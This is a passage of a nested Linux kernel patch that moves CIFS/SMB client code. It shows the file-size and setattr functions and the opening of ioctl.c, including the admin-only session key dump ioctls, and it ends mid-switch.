++	if (tcon == NULL) {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink))
++			return PTR_ERR(tlink);
++		tcon = tlink_tcon(tlink);
++		server = tcon->ses->server;
++	}
++
++	/*
++	 * Set file size by pathname rather than by handle either because no
++	 * valid, writeable file handle for it was found or because there was
++	 * an error setting it by handle.
++	 */
++	if (server->ops->set_path_size)
++		rc = server->ops->set_path_size(xid, tcon, full_path,
++						attrs->ia_size, cifs_sb, false);
++	else
++		rc = -ENOSYS;
++	cifs_dbg(FYI, "SetEOF by path (setattrs) rc = %d\n", rc);
++
++	if (tlink)
++		cifs_put_tlink(tlink);
++
++set_size_out:
++	if (rc == 0) {
++		cifsInode->server_eof = attrs->ia_size;
++		cifs_setsize(inode, attrs->ia_size);
++		/*
++		 * i_blocks is not related to (i_size / i_blksize); instead a
++		 * 512-byte (2**9) block size is required for calculating the
++		 * number of blocks. Until we can query the server for the actual
++		 * allocation size, this is the best estimate we have for the
++		 * blocks allocated for a file. The number of blocks must be
++		 * rounded up so that size 1 is not 0 blocks.
++		 */
++		inode->i_blocks = (512 - 1 + attrs->ia_size) >> 9;
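++		/* e.g. ia_size == 1 gives (511 + 1) >> 9 == 1 block, while
++		 * ia_size == 0 gives 511 >> 9 == 0 blocks */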
++
++		/*
++		 * The man page of truncate says if the size changed,
++		 * then the st_ctime and st_mtime fields for the file
++		 * are updated.
++		 */
++		attrs->ia_ctime = attrs->ia_mtime = current_time(inode);
++		attrs->ia_valid |= ATTR_CTIME | ATTR_MTIME;
++
++		cifs_truncate_page(inode->i_mapping, inode->i_size);
++	}
++
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_setattr_unix(struct dentry *direntry, struct iattr *attrs)
++{
++	int rc;
++	unsigned int xid;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct inode *inode = d_inode(direntry);
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	struct cifs_unix_set_info_args *args = NULL;
++	struct cifsFileInfo *open_file;
++
++	cifs_dbg(FYI, "setattr_unix on file %pd attrs->ia_valid=0x%x\n",
++		 direntry, attrs->ia_valid);
++
++	xid = get_xid();
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
++		attrs->ia_valid |= ATTR_FORCE;
++
++	rc = setattr_prepare(&init_user_ns, direntry, attrs);
++	if (rc < 0)
++		goto out;
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	/*
++	 * Attempt to flush data before changing attributes. We need to do
++	 * this for ATTR_SIZE and ATTR_MTIME for sure, and if we change the
++	 * ownership or mode then we may also need to do this. Here, we take
++	 * the safe way out and just do the flush on all setattr requests. If
++	 * the flush returns an error, store it to report later and continue.
++	 *
++	 * BB: This should be smarter. Why bother flushing pages that
++	 * will be truncated anyway? Also, should we error out here if
++	 * the flush returns an error?
++	 */
++	rc = filemap_write_and_wait(inode->i_mapping);
++	if (is_interrupt_error(rc)) {
++		rc = -ERESTARTSYS;
++		goto out;
++	}
++
++	mapping_set_error(inode->i_mapping, rc);
++	rc = 0;
++
++	if (attrs->ia_valid & ATTR_SIZE) {
++		rc = cifs_set_file_size(inode, attrs, xid, full_path);
++		if (rc != 0)
++			goto out;
++	}
++
++	/* skip mode change if it's just for clearing setuid/setgid */
++	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		attrs->ia_valid &= ~ATTR_MODE;
++
++	args = kmalloc(sizeof(*args), GFP_KERNEL);
++	if (args == NULL) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	/* set up the struct */
++	if (attrs->ia_valid & ATTR_MODE)
++		args->mode = attrs->ia_mode;
++	else
++		args->mode = NO_CHANGE_64;
++
++	if (attrs->ia_valid & ATTR_UID)
++		args->uid = attrs->ia_uid;
++	else
++		args->uid = INVALID_UID; /* no change */
++
++	if (attrs->ia_valid & ATTR_GID)
++		args->gid = attrs->ia_gid;
++	else
++		args->gid = INVALID_GID; /* no change */
++
++	if (attrs->ia_valid & ATTR_ATIME)
++		args->atime = cifs_UnixTimeToNT(attrs->ia_atime);
++	else
++		args->atime = NO_CHANGE_64;
++
++	if (attrs->ia_valid & ATTR_MTIME)
++		args->mtime = cifs_UnixTimeToNT(attrs->ia_mtime);
++	else
++		args->mtime = NO_CHANGE_64;
++
++	if (attrs->ia_valid & ATTR_CTIME)
++		args->ctime = cifs_UnixTimeToNT(attrs->ia_ctime);
++	else
++		args->ctime = NO_CHANGE_64;
++
++	args->device = 0;
++	open_file = find_writable_file(cifsInode, FIND_WR_FSUID_ONLY);
++	if (open_file) {
++		u16 nfid = open_file->fid.netfid;
++		u32 npid = open_file->pid;
++		pTcon = tlink_tcon(open_file->tlink);
++		rc = CIFSSMBUnixSetFileInfo(xid, pTcon, args, nfid, npid);
++		cifsFileInfo_put(open_file);
++	} else {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink)) {
++			rc = PTR_ERR(tlink);
++			goto out;
++		}
++		pTcon = tlink_tcon(tlink);
++		rc = CIFSSMBUnixSetPathInfo(xid, pTcon, full_path, args,
++				    cifs_sb->local_nls,
++				    cifs_remap(cifs_sb));
++		cifs_put_tlink(tlink);
++	}
++
++	if (rc)
++		goto out;
++
++	if ((attrs->ia_valid & ATTR_SIZE) &&
++	    attrs->ia_size != i_size_read(inode)) {
++		truncate_setsize(inode, attrs->ia_size);
++		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
++	}
++
++	setattr_copy(&init_user_ns, inode, attrs);
++	mark_inode_dirty(inode);
++
++	/* force revalidate when any of these times are set since some
++	   of the fs types (e.g. ext3, fat) do not have fine enough
++	   time granularity to match the protocol, and we do not have
++	   a way (yet) to query the server fs's time granularity (and
++	   whether it rounds times down).
++	*/
++	if (attrs->ia_valid & (ATTR_MTIME | ATTR_CTIME))
++		cifsInode->time = 0;
++out:
++	kfree(args);
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_setattr_nounix(struct dentry *direntry, struct iattr *attrs)
++{
++	unsigned int xid;
++	kuid_t uid = INVALID_UID;
++	kgid_t gid = INVALID_GID;
++	struct inode *inode = d_inode(direntry);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifsFileInfo *wfile;
++	struct cifs_tcon *tcon;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	int rc = -EACCES;
++	__u32 dosattr = 0;
++	__u64 mode = NO_CHANGE_64;
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "setattr on file %pd attrs->ia_valid 0x%x\n",
++		 direntry, attrs->ia_valid);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
++		attrs->ia_valid |= ATTR_FORCE;
++
++	rc = setattr_prepare(&init_user_ns, direntry, attrs);
++	if (rc < 0)
++		goto cifs_setattr_exit;
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto cifs_setattr_exit;
++	}
++
++	/*
++	 * Attempt to flush data before changing attributes. We need to do
++	 * this for ATTR_SIZE and ATTR_MTIME.  If the flush of the data
++	 * returns an error, store it to report later and continue.
++	 *
++	 * BB: This should be smarter. Why bother flushing pages that
++	 * will be truncated anyway? Also, should we error out here if
++	 * the flush returns an error? Do we need to check the ATTR_MTIME_SET flag?
++	 */
++	if (attrs->ia_valid & (ATTR_MTIME | ATTR_SIZE | ATTR_CTIME)) {
++		rc = filemap_write_and_wait(inode->i_mapping);
++		if (is_interrupt_error(rc)) {
++			rc = -ERESTARTSYS;
++			goto cifs_setattr_exit;
++		}
++		mapping_set_error(inode->i_mapping, rc);
++	}
++
++	rc = 0;
++
++	if ((attrs->ia_valid & ATTR_MTIME) &&
++	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
++		rc = cifs_get_writable_file(cifsInode, FIND_WR_ANY, &wfile);
++		if (!rc) {
++			tcon = tlink_tcon(wfile->tlink);
++			rc = tcon->ses->server->ops->flush(xid, tcon, &wfile->fid);
++			cifsFileInfo_put(wfile);
++			if (rc)
++				goto cifs_setattr_exit;
++		} else if (rc != -EBADF)
++			goto cifs_setattr_exit;
++		else
++			rc = 0;
++	}
++
++	if (attrs->ia_valid & ATTR_SIZE) {
++		rc = cifs_set_file_size(inode, attrs, xid, full_path);
++		if (rc != 0)
++			goto cifs_setattr_exit;
++	}
++
++	if (attrs->ia_valid & ATTR_UID)
++		uid = attrs->ia_uid;
++
++	if (attrs->ia_valid & ATTR_GID)
++		gid = attrs->ia_gid;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
++		if (uid_valid(uid) || gid_valid(gid)) {
++			mode = NO_CHANGE_64;
++			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
++							uid, gid);
++			if (rc) {
++				cifs_dbg(FYI, "%s: Setting id failed with error: %d\n",
++					 __func__, rc);
++				goto cifs_setattr_exit;
++			}
++		}
++	} else
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID))
++		attrs->ia_valid &= ~(ATTR_UID | ATTR_GID);
++
++	/* skip mode change if it's just for clearing setuid/setgid */
++	if (attrs->ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
++		attrs->ia_valid &= ~ATTR_MODE;
++
++	if (attrs->ia_valid & ATTR_MODE) {
++		mode = attrs->ia_mode;
++		rc = 0;
++		if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)) {
++			rc = id_mode_to_cifs_acl(inode, full_path, &mode,
++						INVALID_UID, INVALID_GID);
++			if (rc) {
++				cifs_dbg(FYI, "%s: Setting ACL failed with error: %d\n",
++					 __func__, rc);
++				goto cifs_setattr_exit;
++			}
++
++			/*
++			 * In case of CIFS_MOUNT_CIFS_ACL, we cannot support all modes.
++			 * Pick up the actual mode bits that were set.
++			 */
++			if (mode != attrs->ia_mode)
++				attrs->ia_mode = mode;
++		} else
++		if (((mode & S_IWUGO) == 0) &&
++		    (cifsInode->cifsAttrs & ATTR_READONLY) == 0) {
++
++			dosattr = cifsInode->cifsAttrs | ATTR_READONLY;
++
++			/* fix up mode if we're not using dynperm */
++			if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM) == 0)
++				attrs->ia_mode = inode->i_mode & ~S_IWUGO;
++		} else if ((mode & S_IWUGO) &&
++			   (cifsInode->cifsAttrs & ATTR_READONLY)) {
++
++			dosattr = cifsInode->cifsAttrs & ~ATTR_READONLY;
++			/* Attributes of 0 are ignored */
++			if (dosattr == 0)
++				dosattr |= ATTR_NORMAL;
++
++			/* reset local inode permissions to normal */
++			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
++				attrs->ia_mode &= ~(S_IALLUGO);
++				if (S_ISDIR(inode->i_mode))
++					attrs->ia_mode |=
++						cifs_sb->ctx->dir_mode;
++				else
++					attrs->ia_mode |=
++						cifs_sb->ctx->file_mode;
++			}
++		} else if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)) {
++			/* ignore mode change - ATTR_READONLY hasn't changed */
++			attrs->ia_valid &= ~ATTR_MODE;
++		}
++	}
++
++	if (attrs->ia_valid & (ATTR_MTIME|ATTR_ATIME|ATTR_CTIME) ||
++	    ((attrs->ia_valid & ATTR_MODE) && dosattr)) {
++		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
++		/* BB: check for rc = -EOPNOTSUPP and switch to legacy mode */
++
++		/*
++		 * Even if the time set fails, there is no sense failing the
++		 * call if the server would set the time to a reasonable value
++		 * anyway, and this check ensures that we are not being called
++		 * from sys_utimes, in which case we ought to fail the call
++		 * back to the user when the server rejects it.
++		 */
++		if ((rc) && (attrs->ia_valid &
++				(ATTR_MODE | ATTR_GID | ATTR_UID | ATTR_SIZE)))
++			rc = 0;
++	}
++
++	/* no local check (inode_change_ok equivalent) needed since the
++	   server does that */
++	if (rc)
++		goto cifs_setattr_exit;
++
++	if ((attrs->ia_valid & ATTR_SIZE) &&
++	    attrs->ia_size != i_size_read(inode)) {
++		truncate_setsize(inode, attrs->ia_size);
++		fscache_resize_cookie(cifs_inode_cookie(inode), attrs->ia_size);
++	}
++
++	setattr_copy(&init_user_ns, inode, attrs);
++	mark_inode_dirty(inode);
++
++cifs_setattr_exit:
++	free_xid(xid);
++	free_dentry_path(page);
++	return rc;
++}
++
++int
++cifs_setattr(struct user_namespace *mnt_userns, struct dentry *direntry,
++	     struct iattr *attrs)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	int rc, retries = 0;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_tcon *pTcon = cifs_sb_master_tcon(cifs_sb);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
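++	/* retry the operation once if it fails with a retryable error */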
++	do {
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++		if (pTcon->unix_ext)
++			rc = cifs_setattr_unix(direntry, attrs);
++		else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++			rc = cifs_setattr_nounix(direntry, attrs);
++		retries++;
++	} while (is_retryable_error(rc) && retries < 2);
++
++	/* BB: add cifs_setattr_legacy for really old servers */
++	return rc;
++}
+diff --git a/fs/smb/client/ioctl.c b/fs/smb/client/ioctl.c
+new file mode 100644
+index 0000000000000..6419ec47c2a85
+--- /dev/null
++++ b/fs/smb/client/ioctl.c
+@@ -0,0 +1,526 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   vfs operations that deal with io control
++ *
++ *   Copyright (C) International Business Machines  Corp., 2005,2013
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/file.h>
++#include <linux/mount.h>
++#include <linux/mm.h>
++#include <linux/pagemap.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifsfs.h"
++#include "cifs_ioctl.h"
++#include "smb2proto.h"
++#include "smb2glob.h"
++#include <linux/btrfs.h>
++
++static long cifs_ioctl_query_info(unsigned int xid, struct file *filep,
++				  unsigned long p)
++{
++	struct inode *inode = file_inode(filep);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct dentry *dentry = filep->f_path.dentry;
++	const unsigned char *path;
++	void *page = alloc_dentry_path();
++	__le16 *utf16_path = NULL, root_path;
++	int rc = 0;
++
++	path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(path)) {
++		free_dentry_path(page);
++		return PTR_ERR(path);
++	}
++
++	cifs_dbg(FYI, "%s %s\n", __func__, path);
++
++	if (!path[0]) {
++		root_path = 0;
++		utf16_path = &root_path;
++	} else {
++		utf16_path = cifs_convert_path_to_utf16(path + 1, cifs_sb);
++		if (!utf16_path) {
++			rc = -ENOMEM;
++			goto ici_exit;
++		}
++	}
++
++	if (tcon->ses->server->ops->ioctl_query_info)
++		rc = tcon->ses->server->ops->ioctl_query_info(
++				xid, tcon, cifs_sb, utf16_path,
++				filep->private_data ? 0 : 1, p);
++	else
++		rc = -EOPNOTSUPP;
++
++ ici_exit:
++	if (utf16_path != &root_path)
++		kfree(utf16_path);
++	free_dentry_path(page);
++	return rc;
++}
++
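++/*
++ * Implements CIFS_IOC_COPYCHUNK_FILE: copy the entire source file (given
++ * by file descriptor) to offset 0 of the destination, using a server-side
++ * copy where the server supports it.
++ */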
++static long cifs_ioctl_copychunk(unsigned int xid, struct file *dst_file,
++			unsigned long srcfd)
++{
++	int rc;
++	struct fd src_file;
++	struct inode *src_inode;
++
++	cifs_dbg(FYI, "ioctl copychunk range\n");
++	/* the destination must be opened for writing */
++	if (!(dst_file->f_mode & FMODE_WRITE)) {
++		cifs_dbg(FYI, "file target not open for write\n");
++		return -EINVAL;
++	}
++
++	/* check if target volume is readonly and take reference */
++	rc = mnt_want_write_file(dst_file);
++	if (rc) {
++		cifs_dbg(FYI, "mnt_want_write failed with rc %d\n", rc);
++		return rc;
++	}
++
++	src_file = fdget(srcfd);
++	if (!src_file.file) {
++		rc = -EBADF;
++		goto out_drop_write;
++	}
++
++	if (src_file.file->f_op->unlocked_ioctl != cifs_ioctl) {
++		rc = -EBADF;
++		cifs_dbg(VFS, "src file seems to be from a different filesystem type\n");
++		goto out_fput;
++	}
++
++	src_inode = file_inode(src_file.file);
++	rc = -EINVAL;
++	if (S_ISDIR(src_inode->i_mode))
++		goto out_fput;
++
++	rc = cifs_file_copychunk_range(xid, src_file.file, 0, dst_file, 0,
++					src_inode->i_size, 0);
++	if (rc > 0)
++		rc = 0;
++out_fput:
++	fdput(src_file);
++out_drop_write:
++	mnt_drop_write_file(dst_file);
++	return rc;
++}
++
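++/*
++ * Fill a versioned smb_mnt_fs_info structure with the share and filesystem
++ * attributes cached on the tcon and copy it back to userspace; used by the
++ * CIFS_IOC_GET_MNT_INFO ioctl below.
++ */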
++static long smb_mnt_get_fsinfo(unsigned int xid, struct cifs_tcon *tcon,
++				void __user *arg)
++{
++	int rc = 0;
++	struct smb_mnt_fs_info *fsinf;
++
++	fsinf = kzalloc(sizeof(struct smb_mnt_fs_info), GFP_KERNEL);
++	if (fsinf == NULL)
++		return -ENOMEM;
++
++	fsinf->version = 1;
++	fsinf->protocol_id = tcon->ses->server->vals->protocol_id;
++	fsinf->device_characteristics =
++			le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics);
++	fsinf->device_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
++	fsinf->fs_attributes = le32_to_cpu(tcon->fsAttrInfo.Attributes);
++	fsinf->max_path_component =
++		le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
++	fsinf->vol_serial_number = tcon->vol_serial_number;
++	fsinf->vol_create_time = le64_to_cpu(tcon->vol_create_time);
++	fsinf->share_flags = tcon->share_flags;
++	fsinf->share_caps = le32_to_cpu(tcon->capabilities);
++	fsinf->sector_flags = tcon->ss_flags;
++	fsinf->optimal_sector_size = tcon->perf_sector_size;
++	fsinf->max_bytes_chunk = tcon->max_bytes_chunk;
++	fsinf->maximal_access = tcon->maximal_access;
++	fsinf->cifs_posix_caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
++
++	if (copy_to_user(arg, fsinf, sizeof(struct smb_mnt_fs_info)))
++		rc = -EFAULT;
++
++	kfree(fsinf);
++	return rc;
++}
++
++static int cifs_shutdown(struct super_block *sb, unsigned long arg)
++{
++	struct cifs_sb_info *sbi = CIFS_SB(sb);
++	__u32 flags;
++
++	if (!capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	if (get_user(flags, (__u32 __user *)arg))
++		return -EFAULT;
++
++	if (flags > CIFS_GOING_FLAGS_NOLOGFLUSH)
++		return -EINVAL;
++
++	if (cifs_forced_shutdown(sbi))
++		return 0;
++
++	cifs_dbg(VFS, "shut down requested (%d)\n", flags);
++/*	trace_cifs_shutdown(sb, flags);*/
++
++	/*
++	 * see:
++	 *   https://man7.org/linux/man-pages/man2/ioctl_xfs_goingdown.2.html
++	 * for more information and a description of the original intent of the flags
++	 */
++	switch (flags) {
++	/*
++	 * We could add support later for default flag which requires:
++	 *     "Flush all dirty data and metadata to disk"
++	 * would need to call syncfs or equivalent to flush page cache for
++	 * the mount and then issue fsync to server (if nostrictsync not set)
++	 */
++	case CIFS_GOING_FLAGS_DEFAULT:
++		cifs_dbg(FYI, "shutdown with default flag not supported\n");
++		return -EINVAL;
++	/*
++	 * FLAGS_LOGFLUSH is easy since it asks to write out metadata (not
++	 * data) but metadata writes are not cached on the client, so we can
++	 * treat it similarly to NOLOGFLUSH
++	 */
++	case CIFS_GOING_FLAGS_LOGFLUSH:
++	case CIFS_GOING_FLAGS_NOLOGFLUSH:
++		sbi->mnt_cifs_flags |= CIFS_MOUNT_SHUTDOWN;
++		return 0;
++	default:
++		return -EINVAL;
++	}
++	return 0;
++}
++
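++/*
++ * Dump the session key and the server encryption/decryption keys of an
++ * encrypted session into the caller's buffer: the smb3_full_key_debug_info
++ * struct is written back first, with the three keys appended immediately
++ * after it (the caller must size the buffer accordingly; this is checked
++ * against in_size below).
++ */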
++static int cifs_dump_full_key(struct cifs_tcon *tcon, struct smb3_full_key_debug_info __user *in)
++{
++	struct smb3_full_key_debug_info out;
++	struct cifs_ses *ses;
++	int rc = 0;
++	bool found = false;
++	u8 __user *end;
++
++	if (!smb3_encryption_required(tcon)) {
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	/* copy user input into our output buffer */
++	if (copy_from_user(&out, in, sizeof(out))) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	if (!out.session_id) {
++		/* if ses id is 0, use current user session */
++		ses = tcon->ses;
++	} else {
++		/* otherwise if a session id is given, look for it in all our sessions */
++		struct cifs_ses *ses_it = NULL;
++		struct TCP_Server_Info *server_it = NULL;
++
++		spin_lock(&cifs_tcp_ses_lock);
++		list_for_each_entry(server_it, &cifs_tcp_ses_list, tcp_ses_list) {
++			list_for_each_entry(ses_it, &server_it->smb_ses_list, smb_ses_list) {
++				if (ses_it->Suid == out.session_id) {
++					ses = ses_it;
++					/*
++					 * since we are using the session outside the crit
++					 * section, we need to make sure it won't be released
++					 * so increment its refcount
++					 */
++					ses->ses_count++;
++					found = true;
++					goto search_end;
++				}
++			}
++		}
++search_end:
++		spin_unlock(&cifs_tcp_ses_lock);
++		if (!found) {
++			rc = -ENOENT;
++			goto out;
++		}
++	}
++
++	switch (ses->server->cipher_type) {
++	case SMB2_ENCRYPTION_AES128_CCM:
++	case SMB2_ENCRYPTION_AES128_GCM:
++		out.session_key_length = CIFS_SESS_KEY_SIZE;
++		out.server_in_key_length = out.server_out_key_length = SMB3_GCM128_CRYPTKEY_SIZE;
++		break;
++	case SMB2_ENCRYPTION_AES256_CCM:
++	case SMB2_ENCRYPTION_AES256_GCM:
++		out.session_key_length = CIFS_SESS_KEY_SIZE;
++		out.server_in_key_length = out.server_out_key_length = SMB3_GCM256_CRYPTKEY_SIZE;
++		break;
++	default:
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	/* check if user buffer is big enough to store all the keys */
++	if (out.in_size < sizeof(out) + out.session_key_length + out.server_in_key_length
++	    + out.server_out_key_length) {
++		rc = -ENOBUFS;
++		goto out;
++	}
++
++	out.session_id = ses->Suid;
++	out.cipher_type = le16_to_cpu(ses->server->cipher_type);
++
++	/* overwrite user input with our output */
++	if (copy_to_user(in, &out, sizeof(out))) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	/* append all the keys at the end of the user buffer */
++	end = in->data;
++	if (copy_to_user(end, ses->auth_key.response, out.session_key_length)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	end += out.session_key_length;
++
++	if (copy_to_user(end, ses->smb3encryptionkey, out.server_in_key_length)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	end += out.server_in_key_length;
++
++	if (copy_to_user(end, ses->smb3decryptionkey, out.server_out_key_length)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++out:
++	if (found)
++		cifs_put_smb_ses(ses);
++	return rc;
++}
++
++long cifs_ioctl(struct file *filep, unsigned int command, unsigned long arg)
++{
++	struct inode *inode = file_inode(filep);
++	struct smb3_key_debug_info pkey_inf;
++	int rc = -ENOTTY; /* strange error - but the precedent */
++	unsigned int xid;
++	struct cifsFileInfo *pSMBFile = filep->private_data;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb;
++	__u64	ExtAttrBits = 0;
++	__u64   caps;
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "cifs ioctl 0x%x\n", command);
++	switch (command) {
++		case FS_IOC_GETFLAGS:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			caps = le64_to_cpu(tcon->fsUnixInfo.Capability);
++#ifdef CONFIG_CIFS_POSIX
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++			if (CIFS_UNIX_EXTATTR_CAP & caps) {
++				__u64	ExtAttrMask = 0;
++				rc = CIFSGetExtAttr(xid, tcon,
++						    pSMBFile->fid.netfid,
++						    &ExtAttrBits, &ExtAttrMask);
++				if (rc == 0)
++					rc = put_user(ExtAttrBits &
++						FS_FL_USER_VISIBLE,
++						(int __user *)arg);
++				if (rc != -EOPNOTSUPP)
++					break;
++			}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++#endif /* CONFIG_CIFS_POSIX */
++			rc = 0;
++			if (CIFS_I(inode)->cifsAttrs & ATTR_COMPRESSED) {
++				/* add in the compressed bit */
++				ExtAttrBits = FS_COMPR_FL;
++				rc = put_user(ExtAttrBits & FS_FL_USER_VISIBLE,
++					      (int __user *)arg);
++			}
++			break;
++		case FS_IOC_SETFLAGS:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			/* caps = le64_to_cpu(tcon->fsUnixInfo.Capability); */
++
++			if (get_user(ExtAttrBits, (int __user *)arg)) {
++				rc = -EFAULT;
++				break;
++			}
++
++			/*
++			 * if (CIFS_UNIX_EXTATTR_CAP & caps)
++			 *	rc = CIFSSetExtAttr(xid, tcon,
++			 *		       pSMBFile->fid.netfid,
++			 *		       extAttrBits,
++			 *		       &ExtAttrMask);
++			 * if (rc != -EOPNOTSUPP)
++			 *	break;
++			 */
++
++			/* Currently only flag we can set is compressed flag */
++			if ((ExtAttrBits & FS_COMPR_FL) == 0)
++				break;
++
++			/* Try to set compress flag */
++			if (tcon->ses->server->ops->set_compression) {
++				rc = tcon->ses->server->ops->set_compression(
++							xid, tcon, pSMBFile);
++				cifs_dbg(FYI, "set compress flag rc %d\n", rc);
++			}
++			break;
++		case CIFS_IOC_COPYCHUNK_FILE:
++			rc = cifs_ioctl_copychunk(xid, filep, arg);
++			break;
++		case CIFS_QUERY_INFO:
++			rc = cifs_ioctl_query_info(xid, filep, arg);
++			break;
++		case CIFS_IOC_SET_INTEGRITY:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			if (tcon->ses->server->ops->set_integrity)
++				rc = tcon->ses->server->ops->set_integrity(xid,
++						tcon, pSMBFile);
++			else
++				rc = -EOPNOTSUPP;
++			break;
++		case CIFS_IOC_GET_MNT_INFO:
++			if (pSMBFile == NULL)
++				break;
++			tcon = tlink_tcon(pSMBFile->tlink);
++			rc = smb_mnt_get_fsinfo(xid, tcon, (void __user *)arg);
++			break;
++		case CIFS_ENUMERATE_SNAPSHOTS:
++			if (pSMBFile == NULL)
++				break;
++			if (arg == 0) {
++				rc = -EINVAL;
++				goto cifs_ioc_exit;
++			}
++			tcon = tlink_tcon(pSMBFile->tlink);
++			if (tcon->ses->server->ops->enum_snapshots)
++				rc = tcon->ses->server->ops->enum_snapshots(xid, tcon,
++						pSMBFile, (void __user *)arg);
++			else
++				rc = -EOPNOTSUPP;
++			break;
++		case CIFS_DUMP_KEY:
++			/*
++			 * Dump encryption keys. This is an old ioctl that only
++			 * handles AES-128-{CCM,GCM}.
++			 */
++			if (pSMBFile == NULL)
++				break;
++			if (!capable(CAP_SYS_ADMIN)) {
++				rc = -EACCES;
++				break;
++			}
++
++			tcon = tlink_tcon(pSMBFile->tlink);
++			if (!smb3_encryption_required(tcon)) {
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			pkey_inf.cipher_type =
++				le16_to_cpu(tcon->ses->server->cipher_type);
++			pkey_inf.Suid = tcon->ses->Suid;
++			memcpy(pkey_inf.auth_key, tcon->ses->auth_key.response,
++					16 /* SMB2_NTLMV2_SESSKEY_SIZE */);
++			memcpy(pkey_inf.smb3decryptionkey,
++			      tcon->ses->smb3decryptionkey, SMB3_SIGN_KEY_SIZE);
++			memcpy(pkey_inf.smb3encryptionkey,
++			      tcon->ses->smb3encryptionkey, SMB3_SIGN_KEY_SIZE);
++			if (copy_to_user((void __user *)arg, &pkey_inf,
++					sizeof(struct smb3_key_debug_info)))
++				rc = -EFAULT;
++			else
++				rc = 0;
++			break;
++		case CIFS_DUMP_FULL_KEY:
++			/*
++			 * Dump encryption keys (handles any key sizes)
++			 */
++			if (pSMBFile == NULL)
++				break;
++			if (!capable(CAP_SYS_ADMIN)) {
++				rc = -EACCES;
++				break;
++			}
++			tcon = tlink_tcon(pSMBFile->tlink);
++			rc = cifs_dump_full_key(tcon, (void __user *)arg);
++			break;
++		case CIFS_IOC_NOTIFY:
++			if (!S_ISDIR(inode->i_mode)) {
++				/* Notify can only be done on directories */
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			cifs_sb = CIFS_SB(inode->i_sb);
++			tlink = cifs_sb_tlink(cifs_sb);
++			if (IS_ERR(tlink)) {
++				rc = PTR_ERR(tlink);
++				break;
++			}
++			tcon = tlink_tcon(tlink);
